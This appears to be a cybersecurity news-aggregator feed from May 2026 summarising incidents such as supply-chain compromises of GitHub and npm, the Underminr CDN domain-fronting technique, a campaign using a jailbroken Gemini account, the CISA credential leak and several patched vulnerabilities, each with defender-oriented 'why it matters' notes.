This article is a direct report on the same Megalodon event, adding specifics on the attack window (May 18 over six hours), the 5,718 malicious commits across 5,561 repositories, the use of GitHub Actions workflows including workflow_dispatch for dormant backdoors, and the link to compromised Tiledesk npm package releases published from poisoned source code.
2026.05.22 100%
The article establishes a distinct new supply-chain campaign, separate from the tracked TeamPCP and Mini Shai-Hulud incidents, with a different actor, larger scope, and specific poisoned GitHub repos and Tiledesk package versions.
Full page
Italy dismantles CINEMAGOAL app operation that stole Netflix, Disney+, Sky, DAZN and Spotify access codes
18D ago 1 sources
Scams & FraudMedia & EntertainmentConsumers & General PublicGovernmentNetflixDisney+SkyDAZNSpotifyEurojust
Italian authorities say they dismantled CINEMAGOAL, a piracy app operation that let customers watch paid streaming services by using stolen or fraudulently obtained access credentials. Investigators say the system used virtual machines in Italy to capture valid authentication and decryption codes from legitimate subscriptions every three minutes, then redistributed them through servers seized in France and Germany. The probe, coordinated with Eurojust, included 100 searches, identified more than 70 resellers, and also disrupted a related IPTV service.
Why it matters: This matters because it was not just copyright infringement but a large-scale unauthorized-access and fraud scheme built around stolen streaming credentials and infrastructure designed to hide users. Streaming providers and affected subscribers should watch for fraudulent account creation and abuse, while defenders should note the use of virtual machines, foreign servers, crypto payments, and fake identities to operate the service.
Sources
Bill Toulas 2026.05.23 100%
The article establishes a distinct new enforcement story centered on the CINEMAGOAL app and its method of harvesting and redistributing valid streaming authentication codes.
Full page
Underminr CDN routing flaw lets attackers disguise malicious traffic as connections to trusted domains
18D ago 1 sources
Zero-Days & CVEsMalwareThreat Actors & APTsTechnology & SoftwareTelecommunicationsGovernment
Researchers say attackers are exploiting a weakness in shared content delivery network (CDN) infrastructure to make malicious connections look like they are going to legitimate websites. The technique, dubbed Underminr, is described as a variant of domain fronting that abuses mismatches between DNS lookups, server name indication (SNI), HTTP Host headers, edge IP addresses, and CDN tenant routing; ADAMnetworks says it affects roughly 88 million domains and has been used to bypass Protective DNS filtering, conceal command-and-control traffic, and tunnel VPN or proxy connections over TCP port 443.
Why it matters: Organizations that rely on DNS filtering or allowlists could miss malicious outbound traffic that appears to be headed to trusted domains. Defenders should review CDN egress controls, correlate DNS, SNI, Host header, and destination IP telemetry, and watch for guidance or mitigations from affected providers.
Sources
Ionut Arghire 2026.05.23 100%
This article appears to be the first tracked report establishing Underminr as a distinct, named CDN abuse technique with active exploitation and broad defensive implications.
Full page
TrendAI says Russian-speaking scammer used jailbroken Gemini to target QAnon and MAGA users with wallet theft and WordPress credential attacks
19D ago 1 sources
Social Engineering & PhishingScams & FraudMalwareTechnology & SoftwareCryptocurrency & BlockchainConsumers & General PublicGoogleWordPressTelegram
A Russian-speaking threat actor allegedly used a jailbroken Google Gemini account to run a months-long scam and theft campaign aimed at QAnon and MAGA communities, stealing WordPress admin credentials and draining at least one victim's cryptocurrency wallets. TrendAI says the operation ran from September 2025 to May 2026 through a Telegram channel with about 17,000 subscribers, used 73 likely stolen Gemini API keys, pushed a fake StellarMonster wallet app that actually installed the GoToResolve remote access tool, and captured victims' seed phrases through a bogus wallet-import screen.
Why it matters: This matters because it blends political-community targeting, AI-assisted social engineering, malware, and direct crypto theft in a way ordinary users can fall for and defenders may miss. Users should avoid wallet apps and recovery prompts promoted in Telegram channels, while organizations should investigate exposed WordPress credentials and watch for abuse of stolen API keys.
Sources
2026.05.22 100%
This article appears to be the first tracked report establishing this specific TrendAI-described campaign by the actor bandcampro using jailbroken Gemini, fake crypto-wallet software, and Telegram-based persona fraud.
Full page
CISA contractor exposed AWS GovCloud and internal agency credentials in public GitHub repository
19D ago 5 sources
Breaches & Data LeaksSupply ChainGovernmentTechnology & SoftwareCISAAmazon Web Services
KrebsOnSecurity reports that a public GitHub repository maintained by a CISA contractor exposed sensitive internal files, plaintext passwords, tokens, and administrative credentials for three AWS GovCloud accounts and other CISA systems. Researchers said some credentials were valid and could authenticate to high-privilege GovCloud environments, and the repository also exposed internal software build and artifactory access details.
Why it matters: This is a major breach-risk event affecting a U.S. federal cybersecurity agency, with potential impact on internal systems, software supply-chain integrity, and government cloud environments. Affected parties need credential rotation, repository auditing, and investigation of possible unauthorized access.
Sources
BrianKrebs 2026.05.22 99%
This is a direct follow-up on the same CISA 'Private-CISA' GitHub exposure, adding that congressional lawmakers are demanding answers and that CISA was still trying to revoke exposed credentials days after notification, including a reportedly still-valid RSA key tied to a GitHub app with broad access to CISA repositories and CI/CD secrets.
SecurityWeek News 2026.05.22 96%
This roundup directly recaps the same incident, adding that the public repository was named "Private-CISA," that the exposure lasted for months, and that the leaked material included administrative keys for multiple AWS GovCloud accounts and plaintext passwords that could have enabled lateral movement or software-package tampering.
Bruce Schneier 2026.05.22 99%
This is the same underlying event: a CISA contractor's public GitHub repository exposing privileged AWS GovCloud credentials and internal CISA deployment and system details; it mainly amplifies the severity and points readers to the reported leak.
2026.05.19 98%
This is the same underlying GitHub exposure event and adds specifics from The Register and GitGuardian on the repository contents, file names, duration of exposure, disclosure timeline, and CISA's response.
BrianKrebs 2026.05.18 100%
This article appears to be the first tracked report establishing the underlying event: a public GitHub leak of valid CISA internal and GovCloud credentials.
Full page
Former C.A. Cloud executives plead guilty to helping tech-support scam networks route and hide fraudulent calls
19D ago 1 sources
Scams & FraudSocial Engineering & PhishingPolicy & RegulationTechnology & SoftwareTelecommunicationsConsumers & General PublicC.A. CloudMicrosoftApple
Two former executives of call-tracking firm C.A. Cloud pleaded guilty to concealing a years-long tech-support scam operation that targeted victims worldwide. Prosecutors say the company knowingly provided phone numbers, call forwarding, recordings, and rotating number pools to fraudsters behind fake malware-warning pop-ups, including scammers impersonating Microsoft and Apple; the pair also allegedly ran a Tunisia call center where employees carried out similar fraud through remote computer access and false invoices.
Why it matters: This matters because it shows the infrastructure behind tech-support scams is being targeted, not just the callers themselves, and the scams often hit older and vulnerable people. Users should be wary of pop-ups or calls claiming their computer is infected, especially if they demand remote access or immediate payment.
Sources
Sergiu Gatlan 2026.05.22 100%
The article establishes a distinct enforcement story about C.A. Cloud executives admitting they knowingly supported tech-support fraud infrastructure, rather than a generic trend piece or a duplicate of an existing tracked case.
Full page
U.S. Supreme Court weighs whether Google geofence warrants violate Americans’ privacy rights in Chatrie case
19D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareLegal & Professional ServicesConsumers & General PublicGoogleU.S. Supreme Court
The U.S. Supreme Court is considering whether police can use geofence warrants to make Google hand over location-history data for everyone near a crime scene, a ruling that could affect millions of users. The case, Chatrie, centers on a Fourth Amendment challenge to a reverse warrant that sought unknown suspects by searching Google location data across a defined area and time window; the outcome could also shape the legality of broader reverse searches such as keyword or AI-chat queries.
Why it matters: This could change how easily law enforcement can obtain bulk location and other sensitive platform data about people who are not suspects. It matters to anyone whose phone or online accounts generate location history, and to privacy defenders, platforms, and policymakers watching limits on digital searches.
Sources
2026.05.22 100%
This article establishes a new tracked story because it centers on the pending Supreme Court decision in Chatrie as a distinct legal event with broad implications for geofence warrants and related reverse-search practices.
Full page
Canadian police arrest alleged Kimwolf botnet operator over record-scale DDoS attacks
19D ago 4 sources
Policy & RegulationMalwareThreat Actors & APTsTechnology & SoftwareConsumers & General PublicGovernmentU.S. Department of Justice
Canadian authorities arrested Ottawa resident Jacob Butler, alleged online as “Dort,” and U.S. prosecutors unsealed charges accusing him of running the Kimwolf Internet-of-Things botnet that hijacked millions of connected devices. The complaint says Kimwolf infected devices such as cameras and digital photo frames, issued more than 25,000 attack commands, powered distributed denial-of-service attacks measured at nearly 30 terabits per second, and was also rented to other criminals; the case follows March seizures of Kimwolf infrastructure and related botnets Aisuru, JackSkid, and Mossad.
Why it matters: This matters to internet providers, enterprises, and anyone running exposed connected devices because it shows how insecure Internet-of-Things products can be turned into large-scale attack infrastructure. Defenders should keep internet-facing devices patched, disable unnecessary exposure, and review mitigations tied to the exploitation path Kimwolf used to spread.
Sources
2026.05.22 98%
This is the same underlying event: the arrest of Ottawa resident Jacob Butler, alleged to be 'Dort,' over operating the KimWolf DDoS-for-hire botnet. The article adds specifics from the unsealed U.S. complaint, including the charge of aiding and abetting computer intrusion, the claim that KimWolf infected more than 1 million devices, issued over 25,000 attack commands, generated attacks approaching 30 Tbps, and was linked to attacks including one against Department of Defense IP space.
Eduard Kovacs 2026.05.22 99%
This article is the same underlying event: the arrest of Ottawa resident Jacob Butler ('Dort') as the alleged Kimwolf botnet operator, with added detail from the Justice Department on the extradition request, the specific aiding-and-abetting computer intrusion charge, and seizure warrants targeting services supporting 45 DDoS-for-hire platforms linked to the botnet.
Sergiu Gatlan 2026.05.22 99%
This article covers the same underlying event: the arrest and charging of Jacob Butler, allegedly known as "Dort," as the suspected KimWolf botnet administrator. It adds details from the unsealed U.S. complaint, the extradition posture, the specific aiding-and-abetting charge, losses to victims, and related seizures of 45 DDoS-for-hire platforms tied to the broader disruption effort.
BrianKrebs 2026.05.21 100%
This article establishes a distinct story because it is the first item here centered on the arrest and cross-border criminal charges against the alleged operator of the Kimwolf IoT botnet.
Full page
CISA opens public reporting channel for Known Exploited Vulnerabilities catalog nominations
19D ago 2 sources
Zero-Days & CVEsPolicy & RegulationGovernmentTechnology & SoftwareCISA
CISA has launched a new public form and email pathway for researchers, vendors, and industry partners to submit vulnerabilities for possible inclusion in its Known Exploited Vulnerabilities (KEV) catalog. The change affects no single CVE or product; instead it creates a formal process for reporting suspected exploited-in-the-wild flaws to CISA, with submitters asked to provide vulnerability details and evidence of active exploitation so the agency can validate and potentially add them to KEV.
Why it matters: The KEV catalog is one of the main lists defenders use to decide what to patch first, so a faster path for outside researchers to report exploitation could speed warnings and remediation across government and private networks. Security teams should expect KEV to remain a key prioritization source and monitor for any changes in how quickly new exploited bugs are added.
Sources
SecurityWeek News 2026.05.22 88%
The article notes CISA's new KEV nomination form as one of the week's items, which is the same policy/process update about opening a public channel for Known Exploited Vulnerabilities submissions.
2026.05.22 100%
This article establishes a distinct story about CISA changing the KEV intake process itself, rather than adding any specific vulnerability already tracked.
Full page
Huawei enterprise router zero-day caused a nationwide telecom blackout in Luxembourg
19D ago 1 sources
Zero-Days & CVEsInformation FreedomTelecommunicationsConsumers & General PublicHuaweiPOST Luxembourg
A zero-day flaw in Huawei enterprise router software was blamed for a July 2025 outage that knocked out landline, 4G, and 5G service across Luxembourg for more than three hours. POST Luxembourg said specially crafted network traffic forced the routers into a reboot loop, causing a denial-of-service condition and disrupting emergency communications for hundreds of thousands of residents. No CVE is provided, and it remains unclear whether Huawei has issued a patch.
Why it matters: This shows how a single unpatched network-device flaw can interrupt phone and mobile service for an entire country, including emergency calls. Organizations using Huawei enterprise routers should urgently seek vendor guidance, limit exposure, and prepare mitigations because patch status is still unclear.
Sources
SecurityWeek News 2026.05.22 100%
The article provides a concrete new event: a previously undisclosed Huawei router vulnerability linked to a real-world national telecom outage.
Full page
TrendAI patches exploited Apex One zero-day CVE-2026-34926 in on-premises servers
19D ago 2 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareGovernmentTrend MicroCISA
TrendAI says attackers exploited a flaw in its Apex One security software before a patch was available, putting organizations that run the on-premises server at risk. The bug, CVE-2026-34926, is a directory traversal vulnerability in Apex One on-premise that can let an attacker alter a key server table and inject malicious code for deployment to agents; TrendAI says admin credentials to the server are required, and CISA has added the CVE to its Known Exploited Vulnerabilities catalog.
Why it matters: Organizations using Apex One on-premises should treat this as urgent because the flaw was exploited in real attacks and could let attackers push malicious code from the management server to protected endpoints. Apply TrendAI's update immediately and review who has administrative and remote access to the Apex One server.
Sources
Sergiu Gatlan 2026.05.22 98%
This article covers the same underlying event: Trend Micro's patch and warning for the actively exploited Apex One on-premises zero-day CVE-2026-34926. It adds concrete detail that the bug is a directory traversal issue allowing code injection to agents from the server, notes Trend observed at least one in-the-wild exploit attempt, and mentions CISA's KEV listing and June 4 federal patch deadline.
Eduard Kovacs 2026.05.22 100%
This article appears to be the first tracked item here for CVE-2026-34926, covering the vendor patch, in-the-wild exploitation, affected product scope, and CISA KEV inclusion.
Full page
Ubiquiti patches five UniFi OS flaws, including three maximum-severity bugs that can be exploited remotely
19D ago 1 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicUbiquiti
Ubiquiti released security updates for UniFi OS after disclosing five vulnerabilities that could let attackers tamper with devices, read files, or run commands. The issues include CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910, all rated maximum severity, plus CVE-2026-33000 and CVE-2026-34911. They affect UniFi OS on UniFi Consoles that run UniFi Network, Protect, Access, Talk, and Connect; the flaws involve improper access control, path traversal, command injection, and information disclosure. Ubiquiti says the bugs can be exploited with low complexity and nearly 100,000 internet-exposed endpoints have been observed.
Why it matters: Organizations and home or small-business users running UniFi OS may be exposed to remote compromise if their management devices are reachable online. This is an update-now issue: apply Ubiquiti's patches promptly and reduce internet exposure of UniFi management interfaces where possible.
Sources
Sergiu Gatlan 2026.05.22 100%
This article appears to be the first clear report of Ubiquiti's May 2026 UniFi OS patch release covering CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000, and CVE-2026-34911, which is distinct from the previously tracked March 2026 UniFi Network Application flaws.
Full page
Europol-led operation seizes First VPN service used by ransomware and cybercrime actors
19D ago 3 sources
Threat Actors & APTsRansomwareEuropol
French and Dutch authorities, with Europol and partners from 16 countries, seized 33 servers and multiple domains tied to the 'First VPN' service, which investigators say was widely used in ransomware, fraud, and data-theft attacks. Authorities arrested or questioned a Ukrainian administrator, infiltrated the service, and said intelligence from the takedown identified thousands of users, with 506 users and 83 intelligence packages shared internationally.
Why it matters: The takedown targets a criminal privacy service that allegedly supported major cybercrime operations and may generate follow-on investigations into ransomware and data-theft cases. Defenders and incident responders should watch for new attribution and victim-notification leads emerging from the seized data.
Sources
Eduard Kovacs 2026.05.22 98%
This article covers the same First VPN takedown and adds that the alleged administrator was arrested in Ukraine, reiterates FBI details that at least 25 ransomware groups used the service, and notes investigators shared data on 506 identified users plus published IoCs and ATT&CK mappings.
Bill Toulas 2026.05.21 100%
This article appears to be the first tracked report of the coordinated seizure of First VPN infrastructure and the identification of its users.
2026.05.20 98%
This article covers the same Europol-led takedown of First VPN, adding details that the operation occurred May 19-20, involved France, the Netherlands and Ukraine, dismantled 33 servers, and yielded a user database exposing thousands of users tied to ransomware, fraud, and data-theft investigations.
Full page
Grafana GitHub breach traced to missed token rotation after TanStack npm supply-chain attack
19D ago 4 sources
Threat Actors & APTsSupply ChainBreaches & Data LeaksTechnology & SoftwareGrafanaGitHubTanStack
Grafana says attackers gained access to its private GitHub repositories after a GitHub workflow token was missed during rotation following the TanStack npm supply-chain attack. The malicious TanStack package executed in Grafana's CI/CD environment, exfiltrated workflow tokens, and led to theft of source code plus some operational business contact information. Grafana says no customer production systems or cloud data were affected.
Why it matters: This matters to defenders because it shows how downstream victims of an npm supply-chain compromise can remain exposed if token rotation is incomplete. Organizations using GitHub Actions and affected TanStack packages should review CI/CD secrets, token scope, and repository access logs.
Sources
Ionut Arghire 2026.05.22 99%
This article is a direct update on the same Grafana incident, adding that Grafana attributes the intrusion to the TanStack/Mini Shai-Hulud supply-chain attack, says attackers downloaded public and private source code plus internal operational and business-contact data, and notes the attackers sent a ransom demand that Grafana refused to pay.
Sergiu Gatlan 2026.05.21 74%
The article connects GitHub’s breach to the same underlying TanStack npm supply-chain campaign that also affected Grafana, providing additional context on the broader attack chain, Nx Console compromise, and TeamPCP-linked activity.
Bill Toulas 2026.05.20 100%
The article provides substantive new facts about the Grafana breach itself, specifically tying the intrusion to the TanStack package compromise and a missed GitHub token rotation, and it does not match any listed existing tracked story.
2026.05.18 73%
This is the same underlying TanStack/Shai-Hulud supply-chain event referenced in the Grafana story, and adds specific root-cause and mitigation details from TanStack: abuse of pull_request_target, GitHub Actions cache poisoning, removal of that workflow pattern, cache disabling, SHA pinning, stronger 2FA, and discussion of invitation-only PRs.
Full page
House Democrats warn Trump budget cuts would reduce CISA and state-local cybersecurity funding
19D ago 1 sources
Policy & RegulationGovernmentCISADepartment of Homeland SecurityMulti-State Information Sharing and Analysis Center
U.S. House Democrats said the Trump administration is pushing major cuts to federal cybersecurity spending that would hit state and local governments. At a Homeland Security subcommittee hearing, lawmakers and state officials pointed to a proposed $707 million cut to the Cybersecurity and Infrastructure Security Agency (CISA), earlier cuts of about $135 million and roughly 1,000 staff, uncertainty around reauthorizing the State and Local Cybersecurity Grant Program, and the loss of federally supported Multi-State Information Sharing and Analysis Center services.
Why it matters: This matters because local governments run emergency services, schools, utilities, and courts, and many rely on federal cyber grants and shared defenses they cannot afford on their own. The practical implication is policy-focused rather than immediate patching: public-sector defenders and watchdogs should track the budget fight closely because fewer staff, grants, and shared services can increase exposure to ransomware and other attacks.
Sources
2026.05.21 100%
This article establishes a distinct policy story centered on proposed U.S. federal cybersecurity funding cuts and their impact on CISA and state/local cyber defense capacity, rather than a specific breach, CVE, or previously tracked legislative fight.
Full page
German hospitals disclose patient-data breach after attack on billing provider Unimed
19D ago 1 sources
Breaches & Data LeaksSurveillance & PrivacyHealthcareInsuranceUnimedUniversity Hospital CologneUniversity Hospital FreiburgHeidelberg University HospitalUniversity Hospital TübingenUlm University Hospital
Several German university hospitals say hackers stole patient and billing data after breaching Unimed, an external provider used to process invoices for privately insured and self-paying patients. Disclosures from Cologne, Freiburg, Heidelberg, Tübingen, Ulm and Mannheim say the intrusion occurred in mid-April and exposed names, addresses, physician details, and in some cases diagnosis, treatment, communications, and limited bank or payment data. Hospitals said their own clinical systems were not breached and patient care was not disrupted.
Why it matters: This affects highly sensitive medical data, including some diagnosis and treatment information, so impacted patients may face privacy harms, impersonation attempts, or fraud. Affected hospitals have stopped sending data to Unimed; patients should watch for breach notices and be cautious of unsolicited calls, emails, or billing messages referencing their care.
Sources
2026.05.21 100%
This article establishes a distinct new breach event centered on Unimed's compromise and the resulting exposure of patient and billing records across multiple German hospitals.
Full page
Belarus-linked GhostWriter uses fake Prometheus training certificates to phish Ukrainian government officials
19D ago 1 sources
Threat Actors & APTsSocial Engineering & PhishingMalwareGovernmentEducationCERT-UAPrometheus
Belarus-linked hackers are sending fake course-certificate emails to Ukrainian government staff to infect their computers with espionage malware. CERT-UA says the campaign, active since spring 2026, uses compromised email accounts and messages posing as Ukraine’s Prometheus learning platform; a PDF leads victims to a ZIP that installs OysterFresh, then OysterBlues and OysterShuck, which collect host and user details and may later deliver Cobalt Strike.
Why it matters: This is a targeted government espionage campaign, so affected organizations should treat related Prometheus certificate emails as suspicious, hunt for the named malware and infrastructure, and isolate infected systems quickly. For users, the practical takeaway is not to open certificate attachments or download archives from unexpected training-platform emails, even if they come from known contacts.
Sources
2026.05.21 100%
The article establishes a distinct CERT-UA-attributed GhostWriter espionage operation using fake Prometheus certificate lures and the OysterFresh malware chain against Ukrainian officials.
Full page
Researchers say deleted Google API keys can remain usable for up to 23 minutes, enabling Gemini data access and billing abuse
20D ago 1 sources
Surveillance & PrivacyTechnology & SoftwareGoogle
Security researchers found that Google API keys may keep working for up to 23 minutes after a user deletes them, leaving developers and organizations exposed during what they believe is a safe shutdown period. Aikido says revocation propagates unevenly across Google's infrastructure, allowing repeated authenticated requests to still succeed against some backend servers; if Gemini is enabled, attackers could access uploaded files and cached conversation context, and abuse automatic billing tier increases to run up large charges.
Why it matters: Anyone using Google APIs, especially Gemini, could still be exposed after deleting a leaked key. Treat key deletion alone as insufficient: rotate credentials quickly, restrict key permissions, watch for ongoing usage and billing spikes, and disable affected projects or services if abuse is underway.
Sources
2026.05.21 100%
This article establishes a distinct security story about delayed revocation of Google API keys and its concrete impact on unauthorized access and financial abuse, rather than updating an existing tracked event.
Full page
Ofcom says Snapchat, Meta and Roblox will change UK child-safety features, while TikTok and YouTube resist new commitments
20D ago 1 sources
Surveillance & PrivacyPolicy & RegulationSocial Engineering & PhishingGovernmentTechnology & SoftwareMedia & EntertainmentConsumers & General PublicOfcomSnapMetaRobloxTikTokYouTube
Britain’s online-safety regulator said several major platforms have promised product changes aimed at better protecting children in the UK. Ofcom said Snap will adopt its recommended anti-grooming measures, including tighter limits on adult contact with children; Roblox will let parents disable direct messages for under-16s; and Meta will hide teens’ connection lists by default on Instagram and use artificial intelligence to detect likely sexualized adult-teen direct messages. Ofcom said TikTok and YouTube did not commit to significant new changes.
Why it matters: This matters to UK families, teens and platform operators because it signals concrete safety and privacy changes tied to regulatory pressure, especially around grooming risks and minors’ visibility online. Users and parents should watch for new default settings and controls, while companies should expect closer enforcement under the UK’s online-safety regime.
Sources
2026.05.21 100%
This article establishes a distinct story about Ofcom extracting specific child-safety and anti-grooming platform commitments from major tech companies, with named product changes and a clear enforcement hook.
Full page
Google accidentally exposed details of an unfixed Chromium flaw that can keep malicious code running after the browser is closed
20D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicGoogleMicrosoftBraveOperaVivaldiThe Browser Company
Google briefly made public the technical details of an unfixed Chromium security flaw that affects Chrome and other Chromium-based browsers including Edge, Brave, Opera, Vivaldi, and Arc. Researcher Lyra Rebane says a malicious website can abuse a Service Worker to keep JavaScript running after the browser is closed, potentially enabling stealthy botnet-style abuse such as proxying traffic or launching distributed denial-of-service attacks; no CVE is listed in the report, and the bug was reportedly marked fixed in tracking systems even though current dev builds still appeared vulnerable.
Why it matters: This matters because simply visiting a malicious site once may be enough to leave a browser doing work in the background without the user's knowledge. Users and defenders should watch for an emergency browser update from Google and other Chromium-based vendors and apply it quickly once available.
Sources
Bill Toulas 2026.05.21 100%
This article establishes a new story because it centers on a distinct Chromium flaw whose accidental public exposure increased near-term exploitation risk before a real fix was shipped.
Full page
Two Americans plead guilty to helping India-based tech-support scam call centers target U.S. victims
20D ago 1 sources
Scams & FraudSocial Engineering & PhishingTelecommunicationsConsumers & General Public
Two U.S. men pleaded guilty to helping India-based tech-support scam centers steal millions from Americans, including elderly and disabled victims. Prosecutors said they provided phone numbers, call routing, tracking, and forwarding services for fake malware pop-up scams from 2016 to 2022, continued after learning customers were fraudulent, and advised scammers to rotate large pools of numbers to evade detection; some victims also gave remote access to their devices, leading to financial theft.
Why it matters: This shows how large tech-support scam operations rely on telecom and call-routing support inside the U.S., not just overseas call centers. People should be wary of pop-ups telling them to call for urgent computer help, and providers and defenders can use the case details to spot number rotation and call-forwarding tactics tied to fraud.
Sources
2026.05.21 100%
This article establishes a distinct enforcement-focused story around guilty pleas tied to the infrastructure that enabled an India-based tech-support scam network, rather than updating any listed breach, malware, or policy story.
Full page
Access Now backs WhatsApp in Ninth Circuit appeal over NSO Pegasus spyware injunction
20D ago 1 sources
Surveillance & PrivacyPolicy & RegulationTechnology & SoftwareTelecommunicationsNonprofits & NGOsConsumers & General PublicWhatsAppMetaNSO GroupAccess Now
Access Now and other civil society groups asked the Ninth Circuit to keep a court order blocking NSO Group from using WhatsApp to target users with Pegasus spyware. The filing concerns NSO’s appeal after WhatsApp and Meta won a permanent injunction and jury verdict in a case over Pegasus being delivered through WhatsApp’s servers to more than 1,400 people in 20 countries, including journalists, activists, and human rights defenders.
Why it matters: This matters because the appeal could shape how strongly U.S. courts can curb commercial spyware used against encrypted messaging users. It is especially relevant to people at risk of surveillance and to companies defending messaging platforms from spyware abuse.
Sources
Natalia Krapiva, Esq. 2026.05.21 100%
This article establishes a distinct legal and surveillance story about NSO’s active appeal of the WhatsApp/Pegasus injunction, with a new amicus filing urging the Ninth Circuit to preserve protections for encrypted communications.
Full page
Researchers report macOS kernel memory-corruption exploit affecting Apple M5 systems
20D ago 1 sources
Zero-Days & CVEsTechnology & SoftwareConsumers & General PublicAppleAnthropic
A newly reported exploit targets a memory-corruption flaw in the macOS kernel on Apple M5 hardware. The source says a group used Anthropic's Mythos AI model to help find the vulnerability and develop an exploit; the brief post does not provide a CVE, affected macOS versions, or details on whether the flaw is patched or exploited in the wild.
Why it matters: A kernel exploit can potentially give attackers deep control over a device, so this is important for Mac users and enterprise defenders even though technical details are still limited. Track for Apple advisories and be ready to apply patches quickly once the vulnerability is formally identified.
Sources
Bruce Schneier 2026.05.21 100%
This article establishes a distinct new vulnerability story: a separately reported macOS kernel memory-corruption exploit on Apple M5, not one of the existing tracked events.
Full page
UK Computer Misuse Act reform proposal would give only narrow legal protection to a small fraction of security researchers
20D ago 1 sources
Policy & RegulationGovernmentTechnology & SoftwareLegal & Professional ServicesUK governmentUK Cyber Security Council
The UK government’s planned cybercrime-law reform would protect very few security researchers from prosecution, according to sources briefed on the proposal. The reported changes to the Computer Misuse Act 1990 would create a statutory defense mainly for scanning internet-facing systems, require researchers to stop once they identify a flaw, and limit eligibility to British nationals with UK Cyber Security Council accreditation—reportedly only about 300 people.
Why it matters: This could leave most bug hunters, academics, and security teams exposed to legal risk for good-faith testing, which may discourage vulnerability discovery and responsible disclosure. Organizations and researchers in the UK should watch the legislation closely because it could shape what defensive testing is legally safe to perform.
Sources
2026.05.21 100%
This article appears to be the first concrete reporting on the scope and limits of the UK’s planned Computer Misuse Act reform, adding specific details about who would and would not be protected.
Full page
China-linked Calypso hackers target telecom providers with Showboat Linux malware and JFMBackdoor for Windows
20D ago 1 sources
Threat Actors & APTsMalwareTelecommunications
A China-linked hacking group has been targeting telecommunications providers in Asia Pacific and parts of the Middle East with new malware for both Linux and Windows systems. Researchers at Lumen Black Lotus Labs and PwC attributed the campaign to Calypso, also called Red Lamassu, and say it has been active since at least mid-2022. The Linux implant, Showboat, is a modular post-compromise framework used for persistence, file transfer, and SOCKS5 proxying to move through victim networks, while the Windows implant, JFMBackdoor, uses DLL sideloading and supports remote commands, file operations, registry changes, screenshots, and anti-forensics.
Why it matters: Telecom providers are high-value targets because they sit in the middle of sensitive communications and critical infrastructure. Organizations in the sector should hunt for these malware families and related telecom-themed impersonation domains, review persistence mechanisms and proxy activity, and check Linux and Windows systems for signs of long-term intrusion.
Sources
Bill Toulas 2026.05.21 100%
This article appears to be the first tracked item establishing this specific Calypso/Red Lamassu telecom espionage campaign and the newly reported Showboat and JFMBackdoor malware families.
Full page
Cisco patches critical Cisco Secure Workload API flaw CVE-2026-20223 enabling Site Admin access
20D ago 3 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareCisco
Cisco released fixes for CVE-2026-20223, a critical 10.0 vulnerability in Cisco Secure Workload Cluster Software caused by insufficient validation and authentication in internal REST API endpoints. The flaw affects SaaS and on-prem deployments and can let remote attackers read sensitive information and modify configurations across tenant boundaries with Site Admin privileges. Patched versions are 3.10.8.3 and 4.0.3.17.
Why it matters: Organizations using Cisco Secure Workload face high-impact administrative compromise and cross-tenant exposure if unpatched. Defenders should prioritize updates because exploitation requires only a crafted API request and no in-the-wild activity is needed for urgency at this severity.
Sources
Sergiu Gatlan 2026.05.21 98%
This article covers the same Cisco Secure Workload event: disclosure and patching of CVE-2026-20223, an unauthenticated flaw in internal REST APIs that can grant Site Admin privileges across tenant boundaries. It adds affected/fixed versions, notes there are no workarounds, and says Cisco has not seen in-the-wild exploitation.
Ionut Arghire 2026.05.21 100%
This article establishes a distinct new story centered on Cisco's disclosure and patching of CVE-2026-20223 in Secure Workload; it does not match any existing tracked event.
2026.05.21 99%
This article covers the same Cisco Secure Workload vulnerability disclosure and patch event for CVE-2026-20223, adding reporting detail on cross-tenant impact, affected fixed versions (3.10.8.3 and 4.0.3.17), lack of workarounds, and that Cisco SaaS deployments were already patched.
Full page
Myspace93 2021 breach exposed plaintext passwords of more than 46,000 users
20D ago 1 sources
Breaches & Data LeaksTechnology & SoftwareMedia & EntertainmentConsumers & General PublicMyspace93Have I Been Pwned
The Register reports that data from a January 2021 breach of the Myspace93 parody social-network site has now been ingested by Have I Been Pwned, with more than 46,000 accounts affected. Exposed data included plaintext usernames and passwords, email addresses, and IP addresses. The site's co-creator said trusted community members abused access to a beta app to download server files and an unencrypted credential store.
Why it matters: Affected users face credential-stuffing and account-takeover risk anywhere they reused passwords, especially because the passwords were stored in plaintext. The story also highlights severe password-handling failures and a delayed public accounting of the breach.
Sources
2026.05.21 100%
This article establishes a distinct breach story centered on the 2021 compromise of Myspace93 and the newly surfaced scope and sensitivity of the leaked user data.
Full page
Dormant former employee account enabled intrusion into U.S. city network and water utility controls
20D ago 1 sources
Breaches & Data LeaksGovernmentEnergy & Utilities
The Register reports that attackers compromised an American city's network by using a long-active account belonging to a former employee, "Greg from Auditing," whose privileges reportedly included domain admin, SCADA operator, and help desk access. The intruders moved through municipal systems, manipulated conference-room devices, and changed water utility settings by turning multiple controls off.
Why it matters: This is a real-world critical-infrastructure compromise caused by basic identity and access management failures, with potential public-safety impact. Municipal and ICS operators should review dormant accounts, privilege assignments, and password reuse risks immediately.
Sources
2026.05.21 100%
This article is the first item here establishing the specific incident: a city-network intrusion and water-system control access enabled by an undeleted ex-employee account.
Full page
GitHub confirms breach of roughly 3,800 internal repositories via malicious VS Code extension
20D ago 7 sources
Supply ChainBreaches & Data LeaksThreat Actors & APTsTechnology & SoftwareGitHubMicrosoft
GitHub confirmed that an employee device was compromised after installing a trojanized VS Code extension, leading to exfiltration of roughly 3,800 internal repositories. The company says it removed the malicious extension from the VS Code Marketplace, isolated the endpoint, and found no evidence that customer data stored outside the affected repos was impacted. TeamPCP claimed responsibility and advertised the stolen code for sale.
Why it matters: This is a significant source-code breach at a core software development platform, with potential downstream supply-chain and trust implications. GitHub users and defenders should watch for follow-on disclosures about exposed secrets, internal tooling, or abuse tied to the stolen repositories.
Sources
Sergiu Gatlan 2026.05.21 98%
This directly updates the same GitHub breach, adding that the malicious extension was Nx Console 18.95.0 and that GitHub links the compromise path to last week’s TanStack npm supply-chain attack; it also adds details on secret rotation and TeamPCP’s claims.
info@thehackernews.com (The Hacker News) 2026.05.21 98%
The article appears to describe the same underlying GitHub intrusion and adds the specific lure/extension name, identifying the malicious VS Code extension as Nx Console.
